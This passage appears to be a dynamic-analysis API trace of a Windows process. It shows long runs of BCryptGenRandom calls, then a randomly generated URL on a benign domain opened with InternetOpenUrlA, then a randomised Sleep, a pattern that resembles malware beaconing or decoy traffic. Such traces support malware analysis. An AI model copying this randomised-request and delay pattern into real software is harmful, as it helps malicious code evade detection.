cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0191.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d60cc, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x4d60cc) returned 0x0 [0191.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0191.382] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.383] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.384] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.385] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.385] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.386] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.387] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d60f1, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x4d60f1) returned 0x0 [0191.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.624] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.624] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.628] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.628] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.628] GetProcessHeap () returned 0x440000 [0191.628] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0191.628] lstrcpyA (in: lpString1=0x4726f0, lpString2="v]4ès://www.yahoo.com" | out: lpString1="v]4ès://www.yahoo.com") returned="v]4ès://www.yahoo.com" [0191.628] lstrcatA (in: lpString1="v]4ès://www.yahoo.com", lpString2="/dnB02was8g6nmxy5xg/sn5v3za04Pirnn9q0avwtfud3zm2cbGenoZJ0xM/S9vtwbmPjmwigv92z10fwsvqcc1xoD5vWnn1/CzHcyt77cjk50pmyozs24d2bjmhv/" | out: lpString1="v]4ès://www.yahoo.com/dnB02was8g6nmxy5xg/sn5v3za04Pirnn9q0avwtfud3zm2cbGenoZJ0xM/S9vtwbmPjmwigv92z10fwsvqcc1xoD5vWnn1/CzHcyt77cjk50pmyozs24d2bjmhv/") returned="v]4ès://www.yahoo.com/dnB02was8g6nmxy5xg/sn5v3za04Pirnn9q0avwtfud3zm2cbGenoZJ0xM/S9vtwbmPjmwigv92z10fwsvqcc1xoD5vWnn1/CzHcyt77cjk50pmyozs24d2bjmhv/" [0191.628] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0191.628] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="v]4ès://www.yahoo.com/dnB02was8g6nmxy5xg/sn5v3za04Pirnn9q0avwtfud3zm2cbGenoZJ0xM/S9vtwbmPjmwigv92z10fwsvqcc1xoD5vWnn1/CzHcyt77cjk50pmyozs24d2bjmhv/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0191.628] GetProcessHeap () returned 0x440000 [0191.628] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0191.628] GetProcessHeap () returned 0x440000 [0191.628] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d6090 | out: hHeap=0x440000) returned 1 [0191.629] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0191.629] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0191.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.629] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0191.629] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0191.629] Sleep (dwMilliseconds=0x1c11e) [0191.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0191.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.842] GetProcessHeap () returned 0x440000 [0191.842] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01d50 [0191.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d51, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a01d51) returned 0x0 [0191.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0191.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0191.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01d66, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a01d66) returned 0x0 [0191.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0191.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 